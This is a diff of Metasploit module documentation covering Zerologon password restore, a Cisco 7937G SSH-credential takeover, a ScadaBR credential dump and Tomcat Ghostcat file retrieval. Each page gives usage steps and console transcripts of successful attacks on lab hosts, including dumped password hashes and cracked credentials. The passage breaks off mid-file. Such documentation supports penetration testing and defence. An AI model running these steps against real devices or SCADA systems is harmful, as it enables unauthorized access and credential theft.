+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set PASSWORD 4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d
+PASSWORD => 4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > show options 
+
+Module options (auxiliary/admin/dcerpc/cve_2020_1472_zerologon):
+
+   Name      Current Setting                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   Required  Description
+   ----      ---------------                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   --------  -----------
+   NBNAME    WIN-GD5KVDKUNIP                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   yes       The server's NetBIOS name
+   PASSWORD  4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d  no        The password to restore for the machine account (in hex)
+   RHOSTS    192.168.159.53                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       no        The netlogon RPC port (TCP)
+
+
+Auxiliary action:
+
+   Name     Description
+   ----     -----------
+   RESTORE  Restore the machine account password
+
+
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
+[*] Running module against 192.168.159.53
+
+[*] 192.168.159.53: - Connecting to the endpoint mapper service...
+[*] 192.168.159.53:6403 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.53[6403] ...
+[*] 192.168.159.53:6403 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.53[6403] ...
+[+] 192.168.159.53:6403 - Successfully set machine account (WIN-GD5KVDKUNIP$) password
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) >
+```
@@ -0,0 +1,450 @@
+## Vulnerable Application
+
+  [Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station.
+  This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.
+
+### Description
+
+  This module exploits a feature that should not be available via the web interface.
+  An unauthenticated user may set the credentials for SSH access to any username and
+  password combination desired, giving access to administrative functions through an SSH connection.
+
+## Verification Steps
+
+  1. Obtain a Cisco 7937G Conference Station.
+  2. Enable Web Access and SSH Access on the device.
+  3. Start msfconsole
+  4. Do: `use auxiliary/admin/http/cisco_7937g_ssh_privesc`
+  5. Do: `set RHOSTS 192.168.1.10`
+  6. Do: `set USER test`
+  7. Do: `set PASS test`
+  8. Do: `run`
+  9. The conference station's SSH service should now be configured with the supplied USER:PASS.
+
+## Options
+
+### PASS
+
+The desired password for setting SSH access
+
+### USER
+
+The desired username for setting SSH access
+
+## Scenarios
+
+### Cisco 7937G Running Firmware Version SCCP-1-4-5-7
+
+#### Successful Scenario
+
+```
+msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
+user => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
+pass => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
+rhosts => 192.168.110.209
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
+
+[*] Running for 192.168.110.209...
+[*] 192.168.110.209 - Attempting to set SSH credentials.
+[*] 192.168.110.209 - SSH attack finished!
+[*] 192.168.110.209 - Try to login using the supplied credentials test:test
+[*] 192.168.110.209 - You must specify the key exchange when connecting or the device will be DoS'd!
+[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(linux/ssh/cve_2020_16137) > exit
+user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
+test@192.168.110.209's password:
+
+$>help
+
+
+Commands 1 to 21:
+help - Shows basic help for all commands.
+echo - Echoes all arguments (arbitrary parameters, up to 9)
+psosMaxShow - Show max number of psos objects created.
+psosFailuresShow - Show failures of psos api calls.
+clearNetStats - Clear statistics counters in Ethernet Driver.
+nicheShow - Show statistics of InterNiche stack.
+psosIntStackShow - Show information on interrupt stack.
+i - Display status of the specified process, or all running processes (Process_name (optional))
+checkStack - Checks the stack.
+reboot - Reboots the phone with an optional parameter.
+logl - Set the lowest log level which will be displayed (0-6)
+logs - Set the log level output for a given module ([module] [0-6])
+logsa - Set the log level output for all modules. ([0-6])
+logt - Set the log display type (0-2)
+logd - Dump the log, parameter is reverse order or not.
+logda - Print all available log modules and their current level.
+setRtRender - Set real time rendering parameters for the log.
+lfu - Send the logfiles to the provisioning server(no parameters).
+del - Delete specified file.
+cat - Concatanate specified files.
+
+Commands 21 to 41:
+copy - Copy a file, can be stdout.
+ls - List the contents of flash.
+ll - List the contents of flash.
+d - Display memory.  <address>,<num words>,<size words>
+m - Display memory.  <address>,<size words>
+ping - Ping a given host (IP or DNS name) [,Data Len in Bytes]
+ifShow - Display ethernet interface statistics (no parameters)
+showStoredConfig - Display configuration as stored in flash (no parameters)
+showRunningConfig - Display the current running configuration (no parameters)
+showBackupConfig - Display backup configuration as stored in flash (no parameters)
+overrideBackupConfig - Override backup flash config with current config (no parameters)
+overrideSecurityBackup - Override backup security sector with current security sector.
+resetConfig - Reset the phone to the default settings(setting type [SPIP],[SPIPCS],[SPIPShoreline])
+configDhcpSet - Set DHCP parameters in the flash. 
+		(DHCP Enabled[YES|NO], Offer Timeout, DHCP Option, DHCP Option Type, 
+		Using statically configured boot server[YES|NO])
+configDnsSet - Set DNS parameters in the flash. (Primary DNS Server, Secondary DNS Server, DNS Domain)
+configNetSet - Set network parameters in the flash. 
+		(IP Address, Subnet Mask, Router, VLAN(can be empty))
+configProvisioningSet - Set provisioning server parameters in the flash. 
+		(Server Name, Using server type[FTP|TFTP|HTTP|HTTPS|FTPS], User, Password)
+configSntpSet - Set SNTP parameters in the flash. (sntpserverName,sntpgmtOffset)
+nslookup - Find the IP for a given hostname
+dnsCacheAShow - Show DNS Cache for A records.
+
+Commands 41 to 61:
+dnsCacheSrvShow - Show DNS Cache for SRV records.
+dnsCacheAFlush - Flush DNS A records from cache.
+version - Display vxWorks bootline, software versions, and hardware version.
+hwBoardSerialSet - Set serial number.  !!!!!Should never be used!!!!!.
+hwVarSet - Set the contents of a hardware var ([var ID] [new value])
+hwVarShow - Display the contents of a hardware var ([var ID])
+simulateKeyPress - Send a key Press event to so like it came from hardware.
+simulateKeyHold - Send a key Hold event to so like it came from hardware.
+simulateKeyRelease - Send a key Release event to so like it came from hardware.
+simulateHookUp - Send a hookswitch event to so like it came from hardware.
+simulateHookDown - Send a hookswitch event to so like it came from hardware.
+ncasMisc - Show misc. non-call information (no parameters)
+ncasCb - Show detailed ncas information, related to either call services,
+		non-call services, or server information (1, 2, or 3)
+uptime - Show phone uptime.
+appPrt - Show UI's call status.
+fntPrt - Show information about fonts available on phone.
+memtop - Shows the top poiter to current memory.
+removeScheduledLogEntry - debug
+addScheduledLogEntry - debug
+fatalError - Simulate fatal error for the phone.
+
+Commands 61 to 81:
+enableStrTruncLog - Enable logging of string truncation.
+disableStrTruncLog - Disable logging of string truncation.
+sendFlashBinImage - Upload binary flash image.
+setMac - debug, here because PSOS can't set the MAC.
+sg - send a bitmap to the boot server
+memShow - Display system memory usage
+memDebug - Toggle memory manager trace flag
+l2Debug - Toggle memory manager trace flag
+wsTest - Web Service Test Tool
+fxShow - Display file transfer manager status
+utilHostByNameShow - Test utilHostByName
+utilDnsShow - Show callbacks for dns queries
+dnsCacheShow - Show DNSACacheShow
+utilEthLinkShow - Show Ethernet link status
+ethConfigTest - Set Ethernet Mode (0 to 4)
+timeTest - Test time
+contrastChg - Change LCD Contrast
+setAdminVlan - Set admin vlan id
+setL2Auth - Set L2 Auth Enable/Disable
+ipAddrChange - Change ip addr configuration
+
+Commands 81 to 101:
+tftpChange - Change tftp addr
+arpStats - Print ARP statistics
+fxPut - Transfer file to remote
+crash - Crash the system
+ipAddrShow - Show ip addr
+rtosSocketShow - Show rtos socket information
+sccpShow - Show protocol
+regManagerShow - show registration manager state
+uiPrintAll - uiPrintAll
+uiPrintSoftKeys - uiPrintSoftKeys
+getVoiceQuality - displays voice quality control status
+uiPrintLocalSoftKeys - uiPrintLocalSoftKeys
+uiStartTone - uiStartTone
+uiStopTone - uiStopTone
+pegPrintAll - pegPrintAll
+uiSMPrintAll - uiStateMachinePrintAll
+lldpSMPrintAll - lldpStateMachinePrintAll
+saveLogLevels - saveLogLevels
+localePrintAll - localePrintAll
+ceShow - Show Client Engine Status
+
+Commands 101 to 121:
+udiShow - Show Unique Device Indentifier
+show - Show Unique Device Indentifier
+pbnShow - Display app & bootrom headers
+upr - Upgrade to a Rockpile Standalone Image
+upm - Upgrade to a Rockpile Manf Image
+setHw - Sets the Rockpile Hardware Id
+getHw - Prints the Rockpile Hardware Id
+setUpf - Sets the Upgrade progress flag
+rstUpf - Resets the Upgrade progress flag
+setMdm - Sets the Manf diag mode flag
+rstMdm - Resets the Manf diag mode flag
+setDhcp - Sets the Manf diag dhcp flag
+rstDhcp - Resets the Manf diag  dhcp flag
+setOrd - Sets the ORD flag
+rstOrd - Resets the ORD flag
+fs - Prin the status of rockpile flags
+cp - Mfg. test diags
+vol - Mfg. test diags
+sig - Mfg. test diags
+os - Mfg. test diags
+
+Commands 121 to 141:
+lcd - Mfg. test diags
+sum - Prints checksums of flash images
+rd - Mfg. test diags
+wr - Mfg. test diags
+eth - Start/stop ethernet hardware
+fstp - Stop FGPIO interface
+hfTxEq - Audio testing for large conf rooms
+ctConv - perform ct convergence test.
+ctModeEnd - terminate ctMode
+ctEnableRx - Enable ctRx 1 on, 0 off
+ctEnableTx - Enable ctTx 1 on, 0 off
+ctMicTx - Route mic # to Tx
+ctEMTx - Route external mic # to Tx
+ctSineTx - [chan], [freq], [dBm]: Generate tone to Tx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
+ctRxSpkr - Send directly to HF speaker
+ctSineSpkr - [chan], [freq], [dBm]: Generate tone to Rx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
+ctNoiseSpkr - [chan], [dBm]: Generate noise to Rx (0 => HD, 1 => HF, default HF, -40dBm)
+displayListeningPorts - Display listening port and process info 
+killListeningProcess - Kill the task associated with the port
+
+$>exit
+```
+
+#### Unsuccessful Scenario
+```
+msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
+user => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
+pass => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
+rhosts => 192.168.110.209
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
+
+[*] Running for 192.168.110.209...
+[*] 192.168.110.209 - Attempting to set SSH credentials.
+[-] 192.168.110.209 - Device doesn't appear to be functioning or web access is not enabled.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Cisco 7937G Running Firmware Version SCCP-1-4-5-5
+
+#### Successful Scenario
+
+```
+msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
+user => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
+pass => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
+rhosts => 192.168.110.209
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
+
+[*] Running for 192.168.110.209...
+[*] 192.168.110.209 - Attempting to set SSH credentials.
+[*] 192.168.110.209 - SSH attack finished!
+[*] 192.168.110.209 - Try to login using the supplied credentials test:test
+[*] 192.168.110.209 - You must specify the key exchange when connecting or the device will be DoS'd!
+[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(linux/ssh/cve_2020_16137) > exit
+user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
+test@192.168.110.209's password:
+
+$>help
+
+
+Commands 1 to 21:
+help - Shows basic help for all commands.
+echo - Echoes all arguments (arbitrary parameters, up to 9)
+psosMaxShow - Show max number of psos objects created.
+psosFailuresShow - Show failures of psos api calls.
+clearNetStats - Clear statistics counters in Ethernet Driver.
+nicheShow - Show statistics of InterNiche stack.
+psosIntStackShow - Show information on interrupt stack.
+i - Display status of the specified process, or all running processes (Process_name (optional))
+checkStack - Checks the stack.
+reboot - Reboots the phone with an optional parameter.
+logl - Set the lowest log level which will be displayed (0-6)
+logs - Set the log level output for a given module ([module] [0-6])
+logsa - Set the log level output for all modules. ([0-6])
+logt - Set the log display type (0-2)
+logd - Dump the log, parameter is reverse order or not.
+logda - Print all available log modules and their current level.
+setRtRender - Set real time rendering parameters for the log.
+lfu - Send the logfiles to the provisioning server(no parameters).
+del - Delete specified file.
+cat - Concatanate specified files.
+
+Commands 21 to 41:
+copy - Copy a file, can be stdout.
+ls - List the contents of flash.
+ll - List the contents of flash.
+d - Display memory.  <address>,<num words>,<size words>
+m - Display memory.  <address>,<size words>
+ping - Ping a given host (IP or DNS name) [,Data Len in Bytes]
+ifShow - Display ethernet interface statistics (no parameters)
+showStoredConfig - Display configuration as stored in flash (no parameters)
+showRunningConfig - Display the current running configuration (no parameters)
+showBackupConfig - Display backup configuration as stored in flash (no parameters)
+overrideBackupConfig - Override backup flash config with current config (no parameters)
+overrideSecurityBackup - Override backup security sector with current security sector.
+resetConfig - Reset the phone to the default settings(setting type [SPIP],[SPIPCS],[SPIPShoreline])
+configDhcpSet - Set DHCP parameters in the flash. 
+		(DHCP Enabled[YES|NO], Offer Timeout, DHCP Option, DHCP Option Type, 
+		Using statically configured boot server[YES|NO])
+configDnsSet - Set DNS parameters in the flash. (Primary DNS Server, Secondary DNS Server, DNS Domain)
+configNetSet - Set network parameters in the flash. 
+		(IP Address, Subnet Mask, Router, VLAN(can be empty))
+configProvisioningSet - Set provisioning server parameters in the flash. 
+		(Server Name, Using server type[FTP|TFTP|HTTP|HTTPS|FTPS], User, Password)
+configSntpSet - Set SNTP parameters in the flash. (sntpserverName,sntpgmtOffset)
+nslookup - Find the IP for a given hostname
+dnsCacheAShow - Show DNS Cache for A records.
+
+Commands 41 to 61:
+dnsCacheSrvShow - Show DNS Cache for SRV records.
+dnsCacheAFlush - Flush DNS A records from cache.
+version - Display vxWorks bootline, software versions, and hardware version.
+hwBoardSerialSet - Set serial number.  !!!!!Should never be used!!!!!.
+hwVarSet - Set the contents of a hardware var ([var ID] [new value])
+hwVarShow - Display the contents of a hardware var ([var ID])
+simulateKeyPress - Send a key Press event to so like it came from hardware.
+simulateKeyHold - Send a key Hold event to so like it came from hardware.
+simulateKeyRelease - Send a key Release event to so like it came from hardware.
+simulateHookUp - Send a hookswitch event to so like it came from hardware.
+simulateHookDown - Send a hookswitch event to so like it came from hardware.
+ncasMisc - Show misc. non-call information (no parameters)
+ncasCb - Show detailed ncas information, related to either call services,
+		non-call services, or server information (1, 2, or 3)
+uptime - Show phone uptime.
+appPrt - Show UI's call status.
+fntPrt - Show information about fonts available on phone.
+memtop - Shows the top poiter to current memory.
+removeScheduledLogEntry - debug
+addScheduledLogEntry - debug
+fatalError - Simulate fatal error for the phone.
+
+Commands 61 to 81:
+enableStrTruncLog - Enable logging of string truncation.
+disableStrTruncLog - Disable logging of string truncation.
+sendFlashBinImage - Upload binary flash image.
+setMac - debug, here because PSOS can't set the MAC.
+sg - send a bitmap to the boot server
+memShow - Display system memory usage
+memDebug - Toggle memory manager trace flag
+l2Debug - Toggle memory manager trace flag
+wsTest - Web Service Test Tool
+fxShow - Display file transfer manager status
+utilHostByNameShow - Test utilHostByName
+utilDnsShow - Show callbacks for dns queries
+dnsCacheShow - Show DNSACacheShow
+utilEthLinkShow - Show Ethernet link status
+ethConfigTest - Set Ethernet Mode (0 to 4)
+timeTest - Test time
+contrastChg - Change LCD Contrast
+setAdminVlan - Set admin vlan id
+setL2Auth - Set L2 Auth Enable/Disable
+ipAddrChange - Change ip addr configuration
+
+Commands 81 to 101:
+tftpChange - Change tftp addr
+arpStats - Print ARP statistics
+fxPut - Transfer file to remote
+crash - Crash the system
+ipAddrShow - Show ip addr
+rtosSocketShow - Show rtos socket information
+sccpShow - Show protocol
+regManagerShow - show registration manager state
+uiPrintAll - uiPrintAll
+uiPrintSoftKeys - uiPrintSoftKeys
+getVoiceQuality - displays voice quality control status
+uiPrintLocalSoftKeys - uiPrintLocalSoftKeys
+uiStartTone - uiStartTone
+uiStopTone - uiStopTone
+pegPrintAll - pegPrintAll
+uiSMPrintAll - uiStateMachinePrintAll
+lldpSMPrintAll - lldpStateMachinePrintAll
+saveLogLevels - saveLogLevels
+localePrintAll - localePrintAll
+ceShow - Show Client Engine Status
+
+Commands 101 to 121:
+udiShow - Show Unique Device Indentifier
+show - Show Unique Device Indentifier
+pbnShow - Display app & bootrom headers
+upr - Upgrade to a Rockpile Standalone Image
+upm - Upgrade to a Rockpile Manf Image
+setHw - Sets the Rockpile Hardware Id
+getHw - Prints the Rockpile Hardware Id
+setUpf - Sets the Upgrade progress flag
+rstUpf - Resets the Upgrade progress flag
+setMdm - Sets the Manf diag mode flag
+rstMdm - Resets the Manf diag mode flag
+setDhcp - Sets the Manf diag dhcp flag
+rstDhcp - Resets the Manf diag  dhcp flag
+setOrd - Sets the ORD flag
+rstOrd - Resets the ORD flag
+fs - Prin the status of rockpile flags
+cp - Mfg. test diags
+vol - Mfg. test diags
+sig - Mfg. test diags
+os - Mfg. test diags
+
+Commands 121 to 141:
+lcd - Mfg. test diags
+sum - Prints checksums of flash images
+rd - Mfg. test diags
+wr - Mfg. test diags
+eth - Start/stop ethernet hardware
+fstp - Stop FGPIO interface
+hfTxEq - Audio testing for large conf rooms
+ctConv - perform ct convergence test.
+ctModeEnd - terminate ctMode
+ctEnableRx - Enable ctRx 1 on, 0 off
+ctEnableTx - Enable ctTx 1 on, 0 off
+ctMicTx - Route mic # to Tx
+ctEMTx - Route external mic # to Tx
+ctSineTx - [chan], [freq], [dBm]: Generate tone to Tx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
+ctRxSpkr - Send directly to HF speaker
+ctSineSpkr - [chan], [freq], [dBm]: Generate tone to Rx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
+ctNoiseSpkr - [chan], [dBm]: Generate noise to Rx (0 => HD, 1 => HF, default HF, -40dBm)
+displayListeningPorts - Display listening port and process info 
+killListeningProcess - Kill the task associated with the port
+
+$>exit
+```
+
+#### Unsuccessful Scenario
+```
+msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
+user => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
+pass => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
+rhosts => 192.168.110.209
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
+
+[*] Running for 192.168.110.209...
+[*] 192.168.110.209 - Attempting to set SSH credentials.
+[-] 192.168.110.209 - Device doesn't appear to be functioning or web access is not enabled.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -1,63 +1,108 @@
-## Description
-
-  This module retrieves credentials from ScadaBR, including service credentials and unsalted SHA1 password hashes for all users, by invoking the `EmportDwr.createExportData` DWR method of Mango M2M which is exposed to all authenticated users regardless of privilege level.
-
-
 ## Vulnerable Application

-  ScadaBR is a SCADA (Supervisory Control and Data Acquisition) system with applications in Process Control and Automation, being developed and distributed using the open source model.
+This module retrieves credentials from ScadaBR, including
+service credentials and unsalted SHA1 password hashes for
+all users, by invoking the `EmportDwr.createExportData` DWR
+method of Mango M2M which is exposed to all authenticated
+users regardless of privilege level.

-  This module has been tested successfully with ScadaBR versions 1.0 CE and 0.9 on Windows and Ubuntu systems.
-
-  Installers:
-
-  * [Windows Installers](https://sourceforge.net/projects/scadabr/files/Software/Installer%20Win32/)
-  * [Linux Installers](https://sourceforge.net/projects/scadabr/files/Software/Linux/)
-  * [Tomcat WAR files](https://sourceforge.net/projects/scadabr/files/Software/WAR/)
+ScadaBR is a SCADA (Supervisory Control and Data Acquisition)
+system with applications in Process Control and Automation,
+being developed and distributed using the open source model.

+This module has been tested successfully with ScadaBR
+versions 1.0 CE and 0.9 on Windows and Ubuntu systems.

 ## Verification Steps

-  1. Start `msfconsole`
-  2. Do: `use auxiliary/admin/http/scadabr_credential_dump`
-  3. Do: `set rhost [IP]`
-  4. Do: `set username [USERNAME]`
-  5. Do: `set password [PASSWORD]`
-  6. Do: `run`
-  7. You should get credentials
+Download:

+* [Windows Installers](https://sourceforge.net/projects/scadabr/files/Software/Installer%20Win32/)
+* [Linux Installers](https://sourceforge.net/projects/scadabr/files/Software/Linux/)
+* [Tomcat WAR files](https://sourceforge.net/projects/scadabr/files/Software/WAR/)
+
+Metasploit:
+
+1. Start `msfconsole`
+1. Do: `use auxiliary/admin/http/scadabr_credential_dump`
+1. Do: `set rhosts [IP]`
+1. Do: `set username [USERNAME]`
+1. Do: `set password [PASSWORD]`
+1. Do: `run`
+1. You should get credentials
+
+## Options
+
+### USERNAME
+
+The username for the application (default: `admin`)
+
+### PASSWORD
+
+The password for the application (default: `admin`)
+
+### PASS_FILE
+
+Wordlist file to crack password hashes (default: `./data/unix_passwords.txt`)

 ## Scenarios

-  ```
-  [+] 172.16.191.166:8080 Authenticated successfully as 'admin'
-  [+] 172.16.191.166:8080 Export successful (4436 bytes)
-  [+] Found 5 users
-  [*] Found weak credentials (admin:admin)
-  [*] Found weak credentials (user:password)
-  [*] Found weak credentials (zxcv:zxcv)
+```
+msf6 > use auxiliary/admin/http/scadabr_credential_dump 
+msf6 auxiliary(admin/http/scadabr_credential_dump) > set rhosts 172.16.191.194
+rhosts => 172.16.191.194
+msf6 auxiliary(admin/http/scadabr_credential_dump) > set username admin
+username => admin
+msf6 auxiliary(admin/http/scadabr_credential_dump) > set password admin
+password => admin
+msf6 auxiliary(admin/http/scadabr_credential_dump) > run
+[*] Running module against 172.16.191.194

-  ScadaBR User Credentials
-  ========================
+[+] 172.16.191.194:8080 Authenticated successfully as 'admin'
+[+] 172.16.191.194:8080 Export successful (4735 bytes)
+[+] Config saved in: /root/.msf4/loot/20210220192214_default_172.16.191.194_scadabr.config_546879.txt
+[+] Found 5 users
+[*] Found weak credentials (admin:admin)
+[*] Found weak credentials (operator:a)
+[*] Found weak credentials (test:sunshine)
+[*] Found weak credentials (user:A)
+[*] Found weak credentials (zxcv:zxcv)

-   Username  Password  Hash (SHA1)                               Admin  E-mail
-   --------  --------  -----------                               -----  ------
-   admin     admin     d033e22ae348aeb5660fc2140aec35850c4da997  true   admin@yourMangoDomain.com
-   operator            ef0cade28a5696433326749bb57c39104ca33550  false  operator@localhost
-   test                86f7e437faa5a7fce15d1ddcb9eaeaea377667b8  false  test@localhost
-   user      password  5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8  true   user@localhost
-   zxcv      zxcv      9878e362285eb314cfdbaa8ee8c300c285856810  false  zxcv@localhost
+ScadaBR User Credentials
+========================

+ Username  Password  Hash (SHA1)                               Role   E-mail
+ --------  --------  -----------                               ----   ------
+ admin     admin     d033e22ae348aeb5660fc2140aec35850c4da997  Admin  admin@yourMangoDomain.com
+ operator  a         86f7e437faa5a7fce15d1ddcb9eaeaea377667b8  User   operator@localhost
+ test      sunshine  8d6e34f987851aa599257d3831a1af040886842f  User   test@localhost
+ user      A         6dcd4ce23d88e2ee9568ba546c007c63d9131c1b  Admin  user@localhost
+ zxcv      zxcv      9878e362285eb314cfdbaa8ee8c300c285856810  User   zxcv@localhost

-  ScadaBR Service Credentials
-  ===========================
+[+] Found SMTP credentials: smtptestuser:smtptestpass@127.0.0.1:25
+[+] Found HTTP proxy credentials: proxytestuser:proxytestpass@127.0.0.1:8080

-   Service     Host       Port  Username       Password
-   -------     ----       ----  --------       --------
-   HTTP proxy  127.0.0.1  8080  proxytestuser  proxytestpass
-   SMTP        127.0.0.1  25    smtptestuser   smtptestpass
+ScadaBR Service Credentials
+===========================

-  [+] Config saved in: /root/.msf4/loot/20170527210941_default_172.16.191.166_scadabr.config_861842.txt
-  [*] Auxiliary module execution completed
-  ```
+ Service     Host       Port  Username       Password
+ -------     ----       ----  --------       --------
+ HTTP proxy  127.0.0.1  8080  proxytestuser  proxytestpass
+ SMTP        127.0.0.1  25    smtptestuser   smtptestpass
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/scadabr_credential_dump) > creds
+Credentials
+===========
+
+host            origin          service          public    private   realm  private_type  JtR Format
+----            ------          -------          ------    -------   -----  ------------  ----------
+172.16.191.194  172.16.191.194  8080/tcp (http)  admin     admin            Password
+172.16.191.194  172.16.191.194  8080/tcp (http)  operator  a                Password
+172.16.191.194  172.16.191.194  8080/tcp (http)  test      sunshine         Password
+172.16.191.194  172.16.191.194  8080/tcp (http)  user      A                Password
+172.16.191.194  172.16.191.194  8080/tcp (http)  zxcv      zxcv             Password
+
+msf6 auxiliary(admin/http/scadabr_credential_dump) > 
+```

@@ -0,0 +1,142 @@
+## Vulnerable Application
+
+### Description
+
+This module can be used to retrieve arbitrary files from anywhere in the web application, including the `WEB-INF` and `META-INF`
+directories and any other location that can be reached via ServletContext.getResourceAsStream() on Apache Tomcat servers.
+It also allows the attacker to process any file in the web application as JSP.
+
+### Setup
+
+Running within a docker container:
+
+```
+docker run --name tomcat --rm -p 8080:8080 -p 8009:8009 tomcat:8.5.32
+```
+
+## Verification Steps
+
+1. Install the application and start it
+2. Start msfconsole
+3. Do: `use auxiliary/admin/http/tomcat_ghostcat`
+4. Do: `set RHOSTS [ip]`
+5. Do: `set RPORT [port]`
+6. Do: `set FILENAME [filename]`
+7. Do: `run`
+
+## Options
+
+### FILENAME
+The file you would like to retrieve from the target web application.
+
+### AJP_PORT
+The port on the target that is running the Apache JServ Protocol (AJP).
+
+## Scenarios
+
+### Apache Tomcat 8.5.32
+
+```
+msf6 > use auxiliary/admin/http/tomcat_ghostcat
+msf6 auxiliary(admin/http/tomcat_ghostcat) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(admin/http/tomcat_ghostcat) > set RPORT 8080
+RPORT => 8080
+msf6 auxiliary(admin/http/tomcat_ghostcat) > set FILENAME /WEB-INF/web.xml
+FILENAME => /WEB-INF/web.xml
+msf6 auxiliary(admin/http/tomcat_ghostcat) > run
+[*] Running module against 127.0.0.1
+Status Code: 200
+Accept-Ranges: bytes
+ETag: W/"1227-1529524397000"
+Last-Modified: Wed, 20 Jun 2018 19:53:17 GMT
+Content-Type: application/xml
+Content-Length: 1227
+<?xml version="1.0" encoding="UTF-8"?>
+<!--
+ Licensed to the Apache Software Foundation (ASF) under one or more
+  contributor license agreements.  See the NOTICE file distributed with
+  this work for additional information regarding copyright ownership.
+  The ASF licenses this file to You under the Apache License, Version 2.0
+  (the "License"); you may not use this file except in compliance with
+  the License.  You may obtain a copy of the License at
+
+      http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+-->
+<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
+  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
